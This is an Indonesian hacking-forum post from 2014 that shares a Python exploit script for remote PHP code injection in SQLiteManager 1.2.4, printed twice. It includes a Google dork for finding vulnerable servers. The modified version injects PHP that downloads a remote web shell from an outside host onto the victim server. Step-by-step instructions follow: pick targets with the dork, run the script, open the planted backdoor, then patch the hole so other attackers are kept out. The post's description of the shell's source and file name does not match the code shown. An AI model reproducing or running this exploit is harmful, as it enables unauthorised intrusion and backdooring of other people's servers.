12-31-2014, 01:37 AM
Dah lama ga ngepost, pengen share aja SQLiteManager 0 Day, versi yang terbukti ampuh adalah versi 1.2.4.
untuk link exploitnya: SQlitemanager.
Penampakan scriptnya:
script di atas bila di jalankan masih error karena beberapa baris yang bukan kode akan di eksekusi oleh python. setelah di edit dikit menjadi:
Pada bagian description di komentar agar tidak di eksekusi, kemudian variabel params yang sebelumnya berisi perintah untuk menampilkan phpinfo() dirubah agar membaca file dari http://www.r57shell.net/c99.txt kemudian di tulis ulang ke file yang bernama evil.php.
step by step:
1. Cari target yang sesuai dengan dork diatas
2. Jalankan script dari command line:
Apabila succeed maka silahkan buka link:
http://target/sqlite/xxx.php agar backdoor bisa di tulis, kemudian buka link http://target/sqlite/evil.php untuk menjalankan shell
3. Bila telah berhasil mendapatkan shell jangan lupa di patch agar tidak di exploit lagi oleh orang lain ..
Terima Kasih..
untuk link exploitnya: SQlitemanager.
Penampakan scriptnya:
Code:
Description:
===============================================================
Exploit Title: SQLiteManager 0Day Remote PHP Code Injection Vulnerability
Google Dork: intitle:SQLiteManager inurl:sqlite/
Date: 23/01/2013
Exploit Author: RealGame
Vendor Homepage: http://www.Relagame.co.il
Software Link: http://sourceforge.net/projects/sqlitemanager/
Version: <=1.2.4
Tested on: Windows XP, Debian 2.6.32-46
CVE: N/A
===============================================================
Vulnerable Softwares:
Name: SQLiteManager
Official Site: http://www.sqlitemanager.org/
Name: Ampps
Official Site: http://www.ampps.com/
Name: VertrigoServ
Official Site: http://vertrigo.sourceforge.net/
===============================================================
About Software:
Official Site: http://www.sqlitemanager.org/
SQLiteManager is a database manager for SQLite databases. You can manage
any SQLite database created on any platform with SQLiteManager.
===============================================================
Easy Way To Fix:
Find: SQLiteStripSlashes($_POST['dbpath'])
Replace: str_replace('.', '', SQLiteStripSlashes($_POST['dbpath']))
On File: ./include/add_database.php
===============================================================
import re
import urllib2
from urllib import urlencode
from sys import argv, exit
def strip_tags(value):
#Strip tags with RegEx
return re.sub('<[^>]*?>', '', value)
def getDbId(sqliteUrl, myDbName):
#Find Components
htmlRes = urllib2.urlopen(sqliteUrl, None, 120).read()
if htmlRes:
#If you found it take all the rows
td = re.findall('<td class="name_db">(.*?)</td>', htmlRes, re.DOTALL)
#Make a dict of stripped columns
for element in td:
if strip_tags(element) == myDbName:
#Return Id
return "".join(re.findall('\?dbsel=(.*?)"', element, re.DOTALL))
return None
def main():
print \
'SQLiteManager Exploit\n' + \
'Made By RealGame\n' + \
'http://www.RealGame.co.il\n'
if len(argv) < 2:
#replace('\\', '/') - To Do The Same In Win And Linux
filename = argv[0].replace('\\', '/').split('/')[-1]
print 'Execute Example: ' + filename + ' http://127.0.0.1/sqlite/\n'
exit()
sqliteUrl = argv[1]
myDbName = "phpinfo"
myDbFile = "phpinfo.php"
#Create Database
params = {'dbname' : myDbName,
'dbVersion' : '2',
'dbRealpath' : None,
'dbpath' : myDbFile,
'action' : 'saveDb'}
urllib2.urlopen(sqliteUrl + "main.php", urlencode(params), 120)
#Get Database ID
dbId = getDbId(sqliteUrl + "left.php", myDbName)
#If Database Created
if dbId:
#Create Table + Shell Creator
params = {'DisplayQuery' : 'CREATE TABLE temptab ( codetab text );\n' + \
'INSERT INTO temptab VALUES (\'<?php phpinfo(); unlink(__FILE__); ?>\');\n',
'sqlFile' : None,
'action' : 'sql',
'sqltype' : '1'}
urllib2.urlopen(sqliteUrl + "main.php?dbsel=%s&table=temptab" %dbId, urlencode(params), 120)
#Inject Code
urllib2.urlopen(sqliteUrl + myDbFile, None, 120)
#Remove Database
urllib2.urlopen(sqliteUrl + "main.php?dbsel=%s&table=&view=&trigger=&function=&action=del" %dbId, None, 120)
print 'Succeed'
return
print 'Failed'
if __name__ == '__main__':
main()
script di atas bila di jalankan masih error karena beberapa baris yang bukan kode akan di eksekusi oleh python. setelah di edit dikit menjadi:
Code:
"""
Description:
===============================================================
Exploit Title: SQLiteManager 0Day Remote PHP Code Injection Vulnerability
Google Dork: intitle:SQLiteManager inurl:sqlite/
Date: 23/01/2013
Exploit Author: RealGame
Vendor Homepage: http://www.Relagame.co.il
Software Link: http://sourceforge.net/projects/sqlitemanager/
Version: <=1.2.4
Tested on: Windows XP, Debian 2.6.32-46
CVE: N/A
===============================================================
Vulnerable Softwares:
Name: SQLiteManager
Official Site: http://www.sqlitemanager.org/
Name: Ampps
Official Site: http://www.ampps.com/
Name: VertrigoServ
Official Site: http://vertrigo.sourceforge.net/
===============================================================
About Software:
Official Site: http://www.sqlitemanager.org/
SQLiteManager is a database manager for SQLite databases. You can manage
any SQLite database created on any platform with SQLiteManager.
===============================================================
Easy Way To Fix:
Find: SQLiteStripSlashes($_POST['dbpath'])
Replace: str_replace('.', '', SQLiteStripSlashes($_POST['dbpath']))
On File: ./include/add_database.php
===============================================================
"""
import re
import urllib2
from urllib import urlencode
from sys import argv, exit
def strip_tags(value):
#Strip tags with RegEx
return re.sub('<[^>]*?>', '', value)
def getDbId(sqliteUrl, myDbName):
#Find Components
htmlRes = urllib2.urlopen(sqliteUrl, None, 120).read()
if htmlRes:
#If you found it take all the rows
td = re.findall('<td class="name_db">(.*?)</td>', htmlRes, re.DOTALL)
#Make a dict of stripped columns
for element in td:
if strip_tags(element) == myDbName:
#Return Id
return "".join(re.findall('\?dbsel=(.*?)"', element, re.DOTALL))
return None
def main():
print \
'SQLiteManager Exploit\n' + \
'Made By RealGame\n' + \
'http://www.RealGame.co.il\n'
if len(argv) < 2:
#replace('\\', '/') - To Do The Same In Win And Linux
filename = argv[0].replace('\\', '/').split('/')[-1]
print 'Execute Example: ' + filename + ' http://127.0.0.1/sqlite/\n'
exit()
sqliteUrl = argv[1]
myDbName = "xxx"
myDbFile = "xxx.php"
#Create Database
params = {'dbname' : myDbName,
'dbVersion' : '2',
'dbRealpath' : None,
'dbpath' : myDbFile,
'action' : 'saveDb'}
urllib2.urlopen(sqliteUrl + "main.php", urlencode(params), 120)
#Get Database ID
dbId = getDbId(sqliteUrl + "left.php", myDbName)
#If Database Created
if dbId:
#Create Table + Shell Creator
params = {'DisplayQuery' : 'CREATE TABLE temptab ( codetab text );\n' + \
'INSERT INTO temptab VALUES (\'<?php $destination=fopen("koteka.php","w");$source=fopen("http://bejina.fr/inc.txt","r");while ($a=fread($source,1024)) fwrite($destination,$a);fclose($source);fclose($destination); ?>\');\n',
'sqlFile' : None,
'action' : 'sql',
'sqltype' : '1'}
urllib2.urlopen(sqliteUrl + "main.php?dbsel=%s&table=temptab" %dbId, urlencode(params), 120)
#Inject Code
urllib2.urlopen(sqliteUrl + myDbFile, None, 120)
#Remove Database
urllib2.urlopen(sqliteUrl + "main.php?dbsel=%s&table=&view=&trigger=&function=&action=del" %dbId, None, 120)
print 'Succeed'
return
print 'Failed'
if __name__ == '__main__':
main()
Pada bagian description di komentar agar tidak di eksekusi, kemudian variabel params yang sebelumnya berisi perintah untuk menampilkan phpinfo() dirubah agar membaca file dari http://www.r57shell.net/c99.txt kemudian di tulis ulang ke file yang bernama evil.php.
step by step:
1. Cari target yang sesuai dengan dork diatas
2. Jalankan script dari command line:
Code:
nasa:exploit nasa$ python nama_script.py http://target/sqlite/
SQLiteManager Exploit
Made By RealGame
http://www.RealGame.co.il
Succeed
nasa:exploit nasa$
Apabila succeed maka silahkan buka link:
http://target/sqlite/xxx.php agar backdoor bisa di tulis, kemudian buka link http://target/sqlite/evil.php untuk menjalankan shell
3. Bila telah berhasil mendapatkan shell jangan lupa di patch agar tidak di exploit lagi oleh orang lain ..
Terima Kasih..
Hacking isn't just Computers & Exploits. It's a Philosophy.